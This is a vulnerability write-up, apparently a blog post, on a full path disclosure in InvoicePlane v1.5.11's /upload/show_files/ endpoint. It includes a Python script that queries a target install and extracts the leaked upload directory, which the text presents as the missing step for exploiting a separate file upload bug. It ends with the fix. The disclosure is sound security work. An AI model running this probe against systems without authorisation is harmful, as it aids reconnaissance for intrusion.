InvoicePlane is one of the more popular open-source CRMs: a GitHub search for a PHP-based open-source CRM usually lists it within the first ten results.

The latest version of InvoicePlane (v1.5.11) has several vulnerabilities. Without wasting any more of your time, let's dive into the details.

  • CWE-200: Exposure of Sensitive Information to an Unauthorized Actor

Full Path Disclosure

On its own, the file upload vulnerability in the same application gives an attacker no direct way to learn where an uploaded file lands on disk without reading the source code. In a custom installation the upload directory can also be changed through the UPLOADS_FOLDER constant in index.php, so the default location cannot simply be assumed. The /upload/show_files/ endpoint closes that gap: its response reveals the full filesystem path of the uploaded file to the attacker, which is exactly what is needed to reach a file planted through the upload bug.

Proof of Concept

[Screenshot: InvoicePlane path disclosure request]

[Screenshot: InvoicePlane path disclosure response]
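As an added check (my own code, not InvoicePlane's and not part of the original post), the script below requests /upload/show_files/ on a target and flags absolute filesystem paths in whatever comes back, then derives the upload directory from a disclosed path. The real request and response are only shown in the screenshots above, so the sample bodies here are constructed, the field names in them are made up, the list of filesystem root prefixes is a heuristic, and the optional cookie is there only in case the endpoint requires a session (the post does not say whether it does).

```python
import re
import sys
import urllib.error
import urllib.request

SHOW_FILES = "/upload/show_files/"

# Heuristic: only treat "/"-prefixed strings as filesystem paths when they start
# under a typical web-server or home root, so URL paths such as /upload/show_files/
# are not reported as leaks. Extend the list for the target's layout.
UNIX_PATH = re.compile(
    r"(?<![\w/])/(?:var|home|srv|opt|usr|tmp|www|Users|Applications)(?:/[\w.\-]+)+"
)
# Windows drive paths; backslashes may appear JSON-escaped (\\) in the body.
WIN_PATH = re.compile(r"\b[A-Za-z]:(?:\\{1,2}[\w.\-]+)+")

# Constructed sample bodies (not real InvoicePlane output; field names are made up).
SAMPLE_UNIX = (
    '[{"name":"invoice-42.pdf",'
    '"fullpath":"/var/www/html/invoiceplane/uploads/customer_files/invoice-42.pdf"}]'
)
SAMPLE_WIN = (
    '{"file":"C:\\\\xampp\\\\htdocs\\\\invoiceplane\\\\uploads\\\\customer_files\\\\a.pdf"}'
)


def find_disclosed_paths(body):
    """Return absolute filesystem paths found in a response body, unescaped, in order."""
    found = []
    for pattern in (UNIX_PATH, WIN_PATH):
        for match in pattern.finditer(body):
            path = match.group(0).replace("\\\\", "\\")  # undo JSON escaping
            if path not in found:
                found.append(path)
    return found


def parent_dir(path):
    """Directory part of a disclosed path: the upload root the file upload bug needs."""
    sep = "\\" if "\\" in path else "/"
    return path.rsplit(sep, 1)[0]


def check_show_files(base_url, cookie=None, timeout=10):
    """GET <base_url>/upload/show_files/ and return any disclosed filesystem paths."""
    req = urllib.request.Request(base_url.rstrip("/") + SHOW_FILES,
                                 headers={"User-Agent": "fpd-check"})
    if cookie:
        req.add_header("Cookie", cookie)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as err:
        # Error pages frequently leak paths too, so scan them as well.
        body = err.read().decode("utf-8", errors="replace")
    return find_disclosed_paths(body)


if __name__ == "__main__":
    if len(sys.argv) < 2:
        # Offline demo against the constructed samples.
        for sample in (SAMPLE_UNIX, SAMPLE_WIN):
            for leaked in find_disclosed_paths(sample):
                print("leak:", leaked, "-> upload dir:", parent_dir(leaked))
        sys.exit(0)
    session = sys.argv[2] if len(sys.argv) > 2 else None
    for leaked in check_show_files(sys.argv[1], cookie=session):
        print("leak:", leaked, "-> upload dir:", parent_dir(leaked))
```

Run it with no arguments to see the detection against the constructed samples, or with a base URL (and optionally a Cookie header value) to test a real install. The fix on the application side is the usual one for CWE-200: a file listing should return only file names or web-relative URLs; the client never needs the absolute path under UPLOADS_FOLDER.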